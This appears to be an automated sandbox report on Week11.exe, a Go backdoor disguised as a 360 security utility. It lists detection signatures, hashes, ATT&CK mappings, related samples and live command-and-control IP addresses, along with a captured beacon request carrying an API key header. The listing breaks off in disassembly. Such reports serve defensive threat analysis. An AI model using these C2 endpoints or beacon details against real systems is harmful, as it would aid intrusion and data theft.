
Windows Analysis Report
Week11.exe

Overview

General Information

Sample name: Week11.exe
Analysis ID: 1553838
MD5: 4fbc4f26e90324c3b535943452460761
SHA1: 032f96166bb573c9029f65aefb91d22b8a4940ed
SHA256: 82e9465d41073e2678135009e179de5a0d0973bf439f6cac53db9b9f45130148

Detection

GO Backdoor
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Found Tor onion address
Detected TCP or UDP traffic on non-standard ports
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

  • System is w10x64
  • Week11.exe (PID: 2172 cmdline: "C:\Users\user\Desktop\Week11.exe" MD5: 4FBC4F26E90324C3B535943452460761)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: Week11.exe PID: 2172 | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security |
    No Sigma rule has matched
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-11-11T17:57:30.483613+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.5 | 49716 | TCP
    2024-11-11T17:57:58.288467+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.5 | 57077 | TCP
    2024-11-11T17:57:20.154104+0100 | 2855536 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 94.103.88.127 | 28670 | TCP
    2024-11-11T17:57:49.549151+0100 | 2855537 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 94.103.88.127 | 28670 | TCP
    2024-11-11T17:57:49.784386+0100 | 2855538 | 1 | A Network Trojan was detected | 94.103.88.127 | 28670 | 192.168.2.5 | 49709 | TCP
    2024-11-11T17:57:20.153843+0100 | 2855539 | 1 | A Network Trojan was detected | 94.103.88.127 | 28670 | 192.168.2.5 | 49709 | TCP


    AV Detection

    Source: Week11.exe | ReversingLabs: Detection: 54%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.8% probability
    Source: Week11.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Week11.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\vmagent_new\bin\joblist\498883\out\Release\QHFileSmasher.pdb | source: Week11.exe

    Networking

    Source: Network traffic | Suricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 94.103.88.127:28670 -> 192.168.2.5:49709
    Source: Network traffic | Suricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.5:49709 -> 94.103.88.127:28670
    Source: Network traffic | Suricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.5:49709 -> 94.103.88.127:28670
    Source: Network traffic | Suricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 94.103.88.127:28670 -> 192.168.2.5:49709
    Source: global traffic | TCP traffic: 94.103.88.127 ports 0,2,28670,6,7,8
    Source: global traffic | TCP traffic: 192.168.2.5:49709 -> 94.103.88.127:28670
    Source: Joe Sandbox View | IP Address: 46.8.232.106
    Source: Joe Sandbox View | IP Address: 188.130.206.243
    Source: Joe Sandbox View | IP Address: 93.185.159.253
    Source: Joe Sandbox View | ASN Name: VDSINA-ASRU
    Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:49716
    Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:57077
    Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknown | TCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknown | TCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknown | TCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknown | TCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknown | HTTP traffic detected: POST / HTTP/1.1
    Host: 46.8.232.106
    User-Agent: Go-http-client/1.1
    Content-Length: 198
    X-Api-Key: IvkcbsG4
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
    Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C526000.00000004.00001000.00020000.00000000.sdmp, Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://188.130.206.243
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C526000.00000004.00001000.00020000.00000000.sdmp, Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://188.130.206.243http://46.8.232.106
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C526000.00000004.00001000.00020000.00000000.sdmp, Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://46.8.232.106
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://46.8.236.61
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://91.212.166.91
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://93.185.159.253
    Source: Week11.exe | String found in binary or memory: http://s.360safe.com/safei18n/
    Source: Week11.exe | String found in binary or memory: http://www.360totalsecurity.com/d/ts/%s/%s/channelOpen
    Source: shared.xml | String found in binary or memory: https://store.360totalsecurity.com/
    Source: Week11.exe | Static PE information: Resource name: UIDATA type: Zip archive data, at least v1.0 to extract, compression method=store
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C538000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe
    Source: Week11.exe, 00000000.00000002.3328025723.000000000C4C2000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C52C000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C54B000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe
    Source: Week11.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engine | Classification label: mal76.troj.evad.winEXE@1/1@0/6
    Source: C:\Users\user\Desktop\Week11.exe | File created: C:\Users\user\AppData\Local\config
    Source: Week11.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Week11.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: Week11.exe | ReversingLabs: Detection: 54%
    Source: C:\Users\user\Desktop\Week11.exe | File read: C:\Users\user\Desktop\Week11.exe
    Source: C:\Users\user\Desktop\Week11.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\Week11.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\Week11.exe | Section loaded: wininet.dll
    Source: C:\Users\user\Desktop\Week11.exe | Section loaded: oleacc.dll
    Source: C:\Users\user\Desktop\Week11.exe | Section loaded: wtsapi32.dll
    Source: C:\Users\user\Desktop\Week11.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\Week11.exe | Section loaded: k7rn7l32.dll
    Source: C:\Users\user\Desktop\Week11.exe | Section loaded: ntd3ll.dll
    Source: C:\Users\user\Desktop\Week11.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\Week11.exe | Section loaded: winmm.dll
    Source: C:\Users\user\Desktop\Week11.exe | Section loaded: powrprof.dll
    Source: C:\Users\user\Desktop\Week11.exe | Section loaded: umpdc.dll
    Source: C:\Users\user\Desktop\Week11.exe | Section loaded: mswsock.dll
    Source: Week11.exe | Static file information: File size 8848896 > 1048576
    Source: Week11.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x790e00
    Source: Week11.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: Week11.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: Week11.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: Week11.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Week11.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: Week11.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: Week11.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Week11.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\vmagent_new\bin\joblist\498883\out\Release\QHFileSmasher.pdb | source: Week11.exe
    Source: Week11.exe | Static PE information: real checksum: 0x128f7b should be: 0x870d47
    Source: C:\Users\user\Desktop\Week11.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: Week11.exe | Binary or memory string: [TOOUGPQFNQM@CQSEDBGIOOTDQVGOPLABPQGF@BQROTESTBIVJGEWVA@FCPFRTESUCKTHEGUT@AGEVMCIESUCKTHEGUTCAGEVMMZXSUCJVJGDVW@AFDPKJRQNUCKTHEFTUBCEGTOOTDFHCKTJGDVVFF@ARHG]LYJ^KTHEFTUCBDFVLLWAVSfVTHEFVVA@FCPKJRB[]JdIHEFTT@@FDWKJQ@USDCcUEFTW@AGEWLLPAWQFMSwXFTUBCEGTMMVGQQGOPM
    Source: Week11.exe | Binary or memory string: [TOOUGPQFNQM@CQSEDBGIOOTDQVGOPLABPQGF@BQROTESTBIVJGEWVA@FCPFRTESUCKTHEGUT@AGEVMCIESUCKTHEGUTCAGEVMMZXSUCJVJGDVW@AFDPKJRQNUCKTHEFTUBCEGTOOTDFHCKTJGDVVFF@ARHG]LYJ^KTHEFTUCBDFVLLWAVSfVTHEFVVA@FCPKJRB[]JdIHEFTT@@FDWKJQ@USDCcUEFTW@AGEWLLPAWQFMSwXFTUBCEGTMMVGQQGOPM[TUBBDEVMMWFPVGOQNC
    Source: Week11.exe, 00000000.00000002.3327018030.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
    Source: C:\Users\user\Desktop\Week11.exe | Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation

    Stealing of Sensitive Information

    Source: Yara match | File source: Process Memory Space: Week11.exe PID: 2172, type: MEMORYSTR

    Remote Access Functionality

    Source: Yara match | File source: Process Memory Space: Week11.exe PID: 2172, type: MEMORYSTR

    MITRE ATT&CK Matrix (a number in front of a technique is the count of matched signatures for that technique)

    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Non-Standard Port | Exfiltration Over Other Network Medium | Abuse Accessibility Features
    Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | LSASS Memory | 11 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 1 Proxy | Traffic Duplication | Data Destruction
    Source | Detection | Scanner | Label | Link
    Week11.exe | 54% | ReversingLabs | Win32.Infostealer.Tinba |
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    http://188.130.206.243 | 0% | Avira URL Cloud | safe |
    http://188.130.206.243/ | 0% | Avira URL Cloud | safe |
    http://188.130.206.243http://46.8.232.106 | 0% | Avira URL Cloud | safe |
    No contacted domains info
    Name | Malicious | Antivirus Detection | Reputation
    http://46.8.232.106/ | false | | high
    http://46.8.236.61/ | false | | high
    http://93.185.159.253/ | false | | high
    http://188.130.206.243/ | false | Avira URL Cloud: safe | unknown
    http://91.212.166.91/ | false | | high
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://46.8.232.106 | Week11.exe, 00000000.00000002.3328802961.000000000C526000.00000004.00001000.00020000.00000000.sdmp, Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmp | false | | high
    http://188.130.206.243http://46.8.232.106 | Week11.exe, 00000000.00000002.3328802961.000000000C526000.00000004.00001000.00020000.00000000.sdmp, Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://188.130.206.243 | Week11.exe, 00000000.00000002.3328802961.000000000C526000.00000004.00001000.00020000.00000000.sdmp, Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://93.185.159.253 | Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmp | false | | high
    http://46.8.236.61 | Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmp | false | | high
    http://www.360totalsecurity.com/d/ts/%s/%s/channelOpen | Week11.exe | false | | high
    http://s.360safe.com/safei18n/ | Week11.exe | false | | high
    http://91.212.166.91 | Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmp | false | | high
    https://store.360totalsecurity.com/ | shared.xml | false | | high
    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
    46.8.232.106 | unknown | Russian Federation | | 28917 | FIORD-AS IP-transit operator in Russia Ukraine and Baltics | false
    188.130.206.243 | unknown | Russian Federation | | 200509 | SVINT-ASNES | false
    94.103.88.127 | unknown | Russian Federation | | 48282 | VDSINA-ASRU | true
    93.185.159.253 | unknown | Russian Federation | | 39912 | I3B-ASAT | false
    91.212.166.91 | unknown | United Kingdom | | 35819 | MOBILY-AS Etihad Etisalat Company Mobily SA | false
    46.8.236.61 | unknown | Russian Federation | | 28917 | FIORD-AS IP-transit operator in Russia Ukraine and Baltics | false
    Joe Sandbox version: 41.0.0 Charoite
    Analysis ID: 1553838
    Start date and time: 2024-11-11 17:56:20 +01:00
    Joe Sandbox product: CloudBasic
    Overall analysis duration: 0h 4m 33s
    Hypervisor based Inspection enabled: false
    Report type: full
    Cookbook file name: default.jbs
    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed: 4
    Number of new started drivers analysed: 0
    Number of existing processes analysed: 0
    Number of existing drivers analysed: 0
    Number of injected processes analysed: 0
    Technologies:
    • EGA enabled
    • AMSI enabled
    Analysis Mode: default
    Analysis stop reason: Timeout
    Sample name: Week11.exe
    Detection: MAL
    Classification: mal76.troj.evad.winEXE@1/1@0/6
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • VT rate limit hit for: Week11.exe
                          No simulations
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    46.8.232.106 | m0Yc9KltGw.exe | malicious | GO Backdoor | 46.8.232.106/
    46.8.232.106 | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 46.8.232.106/
    46.8.232.106 | BwqqVoHR71.exe | malicious | GO Backdoor | 46.8.232.106/
    46.8.232.106 | BwqqVoHR71.exe | malicious | GO Backdoor | 46.8.232.106/
    46.8.232.106 | sV9ElC4fU4.exe | malicious | GO Backdoor | 46.8.232.106/
    46.8.232.106 | antispam_connect1.exe | malicious | GO Backdoor | 46.8.232.106/
    46.8.232.106 | antispam_connect1.exe | malicious | GO Backdoor | 46.8.232.106/
    46.8.232.106 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 46.8.232.106/
    46.8.232.106 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 46.8.232.106/
    188.130.206.243 | m0Yc9KltGw.exe | malicious | GO Backdoor | 188.130.206.243/
    188.130.206.243 | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 188.130.206.243/
    188.130.206.243 | BwqqVoHR71.exe | malicious | GO Backdoor | 188.130.206.243/
    188.130.206.243 | BwqqVoHR71.exe | malicious | GO Backdoor | 188.130.206.243/
    188.130.206.243 | antispam_connect1.exe | malicious | GO Backdoor | 188.130.206.243/
    93.185.159.253 | m0Yc9KltGw.exe | malicious | GO Backdoor | 93.185.159.253/
    93.185.159.253 | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 93.185.159.253/
    93.185.159.253 | BwqqVoHR71.exe | malicious | GO Backdoor | 93.185.159.253/
    93.185.159.253 | BwqqVoHR71.exe | malicious | GO Backdoor | 93.185.159.253/
    93.185.159.253 | sV9ElC4fU4.exe | malicious | GO Backdoor | 93.185.159.253/
    93.185.159.253 | antispam_connect1.exe | malicious | GO Backdoor | 93.185.159.253/
    93.185.159.253 | antispam_connect1.exe | malicious | GO Backdoor | 93.185.159.253/
    93.185.159.253 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 93.185.159.253/
    93.185.159.253 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 93.185.159.253/
                          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SVINT-ASNES | m0Yc9KltGw.exe | malicious | GO Backdoor | 188.130.206.243
SVINT-ASNES | https://t.ly/Oppenheim0511 | malicious | GO Backdoor | 188.130.206.243
SVINT-ASNES | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 188.130.206.243
SVINT-ASNES | https://t.ly/BavariaFilmGmbH2410 | malicious | Unknown | 188.130.206.243
SVINT-ASNES | BwqqVoHR71.exe | malicious | GO Backdoor | 188.130.206.243
SVINT-ASNES | BwqqVoHR71.exe | malicious | GO Backdoor | 188.130.206.243
SVINT-ASNES | antispam_connect1.exe | malicious | GO Backdoor | 188.130.206.243
SVINT-ASNES | na.elf | malicious | Mirai, Moobot | 188.130.200.140
FIORD-AS IP-transit operator in Russia, Ukraine and Baltics | m0Yc9KltGw.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-AS IP-transit operator in Russia, Ukraine and Baltics | https://t.ly/Oppenheim0511 | malicious | GO Backdoor | 46.8.232.106
FIORD-AS IP-transit operator in Russia, Ukraine and Baltics | SecuriteInfo.com.FileRepMalware.3248.17662.exe | malicious | Unknown | 46.8.237.66
FIORD-AS IP-transit operator in Russia, Ukraine and Baltics | fCr6yd61xw.exe | malicious | PureLog Stealer, zgRAT | 46.8.237.66
FIORD-AS IP-transit operator in Russia, Ukraine and Baltics | fCr6yd61xw.exe | malicious | PureLog Stealer, zgRAT | 46.8.237.66
FIORD-AS IP-transit operator in Russia, Ukraine and Baltics | Zo1o3PhmtM.exe | malicious | Unknown | 46.8.237.66
FIORD-AS IP-transit operator in Russia, Ukraine and Baltics | 67JPbskewt.exe | malicious | Unknown | 46.8.237.66
FIORD-AS IP-transit operator in Russia, Ukraine and Baltics | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-AS IP-transit operator in Russia, Ukraine and Baltics | nabspc.elf | malicious | Unknown | 109.248.104.45
VDSINA-ASRU | file.exe | malicious | RedLine, XWorm | 195.2.71.183
VDSINA-ASRU | #U2749VER CUENTA#U2749_#U2464#U2466#U2460#U2462#U2463#U2460#U2466#U2462.hta | malicious | Unknown | 62.113.116.63
VDSINA-ASRU | 6725c86d7fc7f.vbs | malicious | Unknown | 62.113.116.63
VDSINA-ASRU | 6725c86d7fc7b.vbs | malicious | Unknown | 62.113.116.63
VDSINA-ASRU | #U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta | malicious | Unknown | 109.234.39.156
VDSINA-ASRU | #U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta | malicious | Unknown | 109.234.39.156
VDSINA-ASRU | qxRux57rXE.exe | malicious | DCRat, PureLog Stealer, zgRAT | 195.2.79.32
VDSINA-ASRU | sV9ElC4fU4.exe | malicious | GO Backdoor | 94.103.85.114
VDSINA-ASRU | antispam_connect1.exe | malicious | GO Backdoor | 94.103.85.114
VDSINA-ASRU | 5ndBtx7pRX.exe | malicious | GO Backdoor | 94.103.90.9
I3B-ASAT | XWHcHAzqPR.exe | malicious | Unknown | 195.16.240.249
I3B-ASAT | byte.sh4.elf | malicious | Mirai, Okiru | 195.16.237.179
I3B-ASAT | m0Yc9KltGw.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | https://t.ly/Oppenheim0511 | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | la.bot.sh4.elf | malicious | Unknown | 195.16.243.93
I3B-ASAT | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | https://t.ly/BavariaFilmGmbH2410 | malicious | Unknown | 93.185.159.253
I3B-ASAT | BwqqVoHR71.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | BwqqVoHR71.exe | malicious | GO Backdoor | 93.185.159.253
                          No context
                          No context
                          Process:C:\Users\user\Desktop\Week11.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):416
                          Entropy (8bit):6.250698587156274
                          Encrypted:false
                          SSDEEP:12:4Mb8aSLQVw8h05a2RpqaHwnJAjUpqqUss5vU:bgaxVwo0d4sUpqqUu
                          MD5:75D8C920F037EE923D1A486C1405C384
                          SHA1:94E2E0B7D82A87175CC221569561CDC2A0716F72
                          SHA-256:B16F92F9C2861265E8581C8DBB54694EE6FE692B96F404841BDDF61E80CB37ED
                          SHA-512:134E5BE4D0293B4DCDDCE640566565622E446D4B2BF45F117B626FE221D3D66628B0C4E0D40714CFEA4D7A8C0B6C4594BDF88DC30AC2882B18EB4D30CA51E247
                          Malicious:false
                          Reputation:low
                          Preview:.![-.=...$"..+].ST:?A4.WL.9Q]^%\XT.1M.%.Q$.W@.[.Q%-.Z2..\S1?M-..X..(^2.$UV.(E#.Y...1..)>.7S?..;.Y?;.F.0"A_Y.W.\._$.-@._>[],-GPV(\".%P(Y1_.V^@..?U..RX4..B(Z..V.<.#.*........S"..A.X_L:_!PP48]...MV.!XT,ZVP1 V%W.GP78_.\$V["*PQ&.@.]0Q<V.\.Z.]..=O\...1.Z.+.)..4P._..TQ.6L ..F..#W.0"RW9*G+2?\4:.R7[4[.1.@W.?R5./_.T.XQ..M9..PUT8_.\QO.-^.,.8..:?...V.>3 T...L]7$F."(_?.,[6-.Q?/*@.&.R[\.Z!Z ^S..MX.'[%..^ >2U?.(G7.&\.P.WY.?Z.S
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.35629862468688
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:Week11.exe
                          File size:8'848'896 bytes
                          MD5:4fbc4f26e90324c3b535943452460761
                          SHA1:032f96166bb573c9029f65aefb91d22b8a4940ed
                          SHA256:82e9465d41073e2678135009e179de5a0d0973bf439f6cac53db9b9f45130148
                          SHA512:a6e2bf5a0f5268aaae2dd21f1fede5be9a6afc9bf967438578fd4809a58859ce873c6aa3fc95ec65e2a29470577c4ffa8f0ad186f410f76533d5b2e5d7094c09
                          SSDEEP:98304:O3joQ1BjUhH1aOFHyq0KqSYLsDu0eK0DuCglDboo:ijUhVa2HyqgLIuXKyu1R0o
                          TLSH:EF96AEAB09176DD5EEF84F719728E99A4396C463B93CC1BEBB4764A8C211BC344E03D4
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B...,...,...,.......,.......,...B...,...A...,...W...,...-...,.......,.....i.,.......,.......,.......,.......,.Rich..,........
                          Icon Hash:615545d4aaa2d423
                          Entrypoint:0x48eb4e
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x5F92B0F1 [Fri Oct 23 10:31:13 2020 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:44c9a0d6caae769769c87976fb6f71d4
                          Signature Valid:
                          Signature Issuer:
                          Signature Validation Error:
                          Error Number:
                          Not Before, Not After
                            Subject Chain
                              Version:
                              Thumbprint MD5:
                              Thumbprint SHA-1:
                              Thumbprint SHA-256:
                              Serial:
                              Instruction
                              call 00007F085CB7FBF9h
                              jmp 00007F085CB71A4Eh
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              push ecx
                              push ebx
                              mov eax, dword ptr [ebp+0Ch]
                              add eax, 0Ch
                              mov dword ptr [ebp-04h], eax
                              mov ebx, dword ptr fs:[00000000h]
                              mov eax, dword ptr [ebx]
                              mov dword ptr fs:[00000000h], eax
                              mov eax, dword ptr [ebp+08h]
                              mov ebx, dword ptr [ebp+0Ch]
                              mov ebp, dword ptr [ebp-04h]
                              mov esp, dword ptr [ebx-04h]
                              jmp eax
                              pop ebx
                              leave
                              retn 0008h
                              pop eax
                              pop ecx
                              xchg dword ptr [esp], eax
                              jmp eax
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              push ecx
                              push ecx
                              push ebx
                              push esi
                              push edi
                              mov esi, dword ptr fs:[00000000h]
                              mov dword ptr [ebp-04h], esi
                              mov dword ptr [ebp-08h], 0048EBBCh
                              push 00000000h
                              push dword ptr [ebp+0Ch]
                              push dword ptr [ebp-08h]
                              push dword ptr [ebp+08h]
                              call 00007F085CB8A6A3h
                              mov eax, dword ptr [ebp+0Ch]
                              mov eax, dword ptr [eax+04h]
                              and eax, FFFFFFFDh
                              mov ecx, dword ptr [ebp+0Ch]
                              mov dword ptr [ecx+04h], eax
                              mov edi, dword ptr fs:[00000000h]
                              mov ebx, dword ptr [ebp-04h]
                              mov dword ptr [ebx], edi
                              mov dword ptr fs:[00000000h], ebx
                              pop edi
                              pop esi
                              pop ebx
                              leave
                              retn 0008h
                              push ebp
                              mov ebp, esp
                              sub esp, 08h
                              push ebx
                              push esi
                              push edi
                              cld
                              mov dword ptr [ebp-04h], eax
                              xor eax, eax
                              push eax
                              push eax
